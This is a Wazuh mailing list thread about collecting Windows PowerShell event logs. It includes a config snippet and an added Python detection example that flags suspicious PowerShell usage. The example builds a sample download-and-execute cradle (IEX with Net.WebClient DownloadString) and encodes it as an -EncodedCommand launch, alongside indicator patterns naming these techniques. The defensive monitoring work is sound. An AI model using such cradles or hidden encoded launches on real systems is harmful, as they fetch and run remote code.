Monitoring MS Powershell


Bill Green

May 14, 2021, 8:42:45 AM
to Wazuh mailing list
Good morning,

First I want to say thanks again for all the help this group has been!

I may not be searching the group properly but, I'm trying to determine if and how I would monitor the Windows PowerShell event logs under the Application and Service Logs on a Windows client.

I use PowerShell pretty regularly on my laptop and I have the Wazuh client installed but I don't see any of the PowerShell events when I look at the security events of my laptop's agent in the dashboard. So I assume I need to update both the ossec.conf on the manager and the ossec.conf on my laptop but I'm just guessing.

Since so much malware/ransomware uses PowerShell covertly I would really love to monitor for odd PowerShell usage and appreciate any guidance on how to set that up.

I apologize if this has been addressed in the past and I didn't find the article.

Thanks for your help!
Bill

Rafael Antonio Rodriguez Otero

May 14, 2021, 10:20:08 AM
to Bill Green, Wazuh mailing list
Hello.

I would like to understand more about your problem, can you give me more information? Exactly what do you want to detect?

If you can send me images I will appreciate it.

Greetings.

Bill Green

May 14, 2021, 12:18:12 PM
to Wazuh mailing list
Sure - I apologize, I don't think I described the issue very well. I think all I really meant to ask was how to monitor the PowerShell events that are logged in the Windows Event Viewer. I've attached a screen grab.

I appreciate the help and apologize for the delay in responding.

Bill

powershell event log.PNG

Octavio Valle López

May 15, 2021, 12:56:56 AM
to Wazuh mailing list
Hi, I hope you are well!

It is a very good question, and from the Wazuh side we agree with you that, currently, PowerShell is an important vector for attackers due to its great power and versatility.

The answer to your question is yes: currently we listen to different types of events through the event channel, and those, particularly the ones from the Event Viewer, are easy to obtain with a configuration similar to this:

<localfile>
  <!-- Classic "Windows PowerShell" log: 400/403 = engine start/stop, 600 = provider start -->
  <location>Windows PowerShell</location>
  <log_format>eventchannel</log_format>
  <query>Event/System[EventID \>= 400 and EventID \<= 600]</query>
</localfile>

I will also leave you the documentation so that you can create custom rules once you receive these events, and thus be able to alert or trigger a later active response.

https://documentation.wazuh.com/current/user-manual/ruleset/custom.html
https://documentation.wazuh.com/current/user-manual/capabilities/log-data-collection/how-to-collect-wlogs.html#windows-eventlog-vs-windows-eventchannel

My next question is: do you want to go a little further and analyze the buffers that are executed by PowerShell? There are ways to do it through ETW channels, but it takes a bit more complexity to develop.
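Octavio's reply above stops at collecting the events. The block below is an added example, not part of the thread or of the Wazuh project, sketching the kind of matching one would then encode in custom rules: it pulls the operator-visible command text out of the two PowerShell channels (the classic "Windows PowerShell" log and Microsoft-Windows-PowerShell/Operational script block events), decodes a -EncodedCommand payload (PowerShell base64-encodes the UTF-16LE bytes of the script, so a UTF-8 decode yields interleaved NULs) and flags a handful of common indicators. The sample events are constructed; the field layout (win.system.channel, win.system.eventID, win.system.message, win.eventdata.scriptBlockText) follows the shape Wazuh's eventchannel decoder produces but is treated here as an assumption, as are the indicator patterns.

```python
"""Added example: triage PowerShell events shaped like Wazuh eventchannel output.

Sample events are constructed, not captured. The win.system.* / win.eventdata.*
layout is assumed from Wazuh's eventchannel decoder; adapt field names locally.
"""
import base64
import re
from typing import Optional

# -EncodedCommand (and its -e / -enc short forms) followed by a base64 blob.
ENCODED_ARG = re.compile(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)

# Indicators of the "odd usage" the thread asks about. Narrow on purpose;
# tune to your fleet so legitimate admin scripts do not drown the alerts.
INDICATORS = {
    "invoke-expression": re.compile(r"\bI(?:nvoke-)?EX(?:pression)?\b", re.I),
    "download-cradle": re.compile(
        r"DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest|\biwr\b", re.I),
    "hidden-window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "no-profile": re.compile(r"-nop(?:rofile)?\b", re.I),
    "encoded-command": ENCODED_ARG,
    "base64-decode": re.compile(r"FromBase64String", re.I),
    "exec-policy-bypass": re.compile(r"-e(?:p|xecutionpolicy)\s+bypass", re.I),
}


def decode_encoded_command(command_line: str) -> Optional[str]:
    """Return the plaintext behind -EncodedCommand, or None when absent or invalid.

    PowerShell base64-encodes the UTF-16LE bytes of the script, so decode as
    utf-16-le, never utf-8. Bad padding or an odd byte count both raise
    ValueError (binascii.Error and UnicodeDecodeError are subclasses) and are
    treated as "no usable payload" rather than crashing the pipeline.
    """
    match = ENCODED_ARG.search(command_line)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except ValueError:
        return None


def command_text(event: dict) -> str:
    """Pull the operator-visible text out of the two PowerShell channels."""
    system = event["win"]["system"]
    channel, event_id = system.get("channel"), str(system.get("eventID"))
    if channel == "Microsoft-Windows-PowerShell/Operational" and event_id == "4104":
        # Script Block Logging: the de-obfuscated script text itself.
        return event["win"].get("eventdata", {}).get("scriptBlockText", "")
    if channel == "Windows PowerShell" and event_id in {"400", "403", "600"}:
        # Classic engine/provider lifecycle events: the host command line is
        # buried in the message body as a HostApplication=... line.
        match = re.search(r"HostApplication=(.*)", system.get("message", ""))
        return match.group(1).strip() if match else ""
    return ""


def triage(event: dict) -> list:
    """Return the indicator names that fire for one decoded event, in INDICATORS order."""
    text = command_text(event)
    decoded = decode_encoded_command(text)
    if decoded is not None:
        text = f"{text}\n{decoded}"  # inspect the payload, not just the wrapper
    return [name for name, pattern in INDICATORS.items() if pattern.search(text)]


# Constructed payload: a download cradle wrapped the way it is usually passed
# on the command line (points at localhost; nothing is fetched here).
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://127.0.0.1:8000/a.ps1')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [  # constructed, in the assumed Wazuh-decoded shape
    {"win": {"system": {"channel": "Microsoft-Windows-PowerShell/Operational",
                        "eventID": "4104", "providerName": "Microsoft-Windows-PowerShell"},
             "eventdata": {"scriptBlockText": "Get-ChildItem C:\\Users | Sort-Object LastWriteTime"}}},
    {"win": {"system": {"channel": "Windows PowerShell", "eventID": "400",
                        "providerName": "PowerShell",
                        "message": ("Engine state is changed from None to Available.\n"
                                    "Details:\n\tNewEngineState=Available\n"
                                    "\tHostName=ConsoleHost\n"
                                    f"\tHostApplication=powershell.exe -nop -w hidden -enc {ENCODED}\n"
                                    "\tEngineVersion=5.1.19041.906")}}},
    {"win": {"system": {"channel": "Microsoft-Windows-PowerShell/Operational",
                        "eventID": "4104", "providerName": "Microsoft-Windows-PowerShell"},
             "eventdata": {"scriptBlockText":
                 "$c = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($p)); "
                 "Invoke-Expression $c"}}},
]

if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        system = event["win"]["system"]
        print(system["channel"], system["eventID"], triage(event) or "clean")
```

The first sample stays clean, the encoded-command launch fires five indicators only because the payload is decoded first (the wrapper alone shows just the -nop/-w hidden/-enc flags), and the third shows the same cradle rebuilt inside a script block, which is why both channels are worth collecting.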

Gal Akavia

Dec 11, 2021, 3:43:10 AM
to Wazuh mailing list
Hi Octavio,
I'm also in that position.
I'm working on Wazuh rules to trigger when some specific PS commands are launched, like IES.
It would be great to hear about "analyze the buffers that are executed by powershell", if still relevant.

Thanks!

Valton T.

Apr 26, 2023, 8:16:24 AM
to Wazuh mailing list
Anything about this?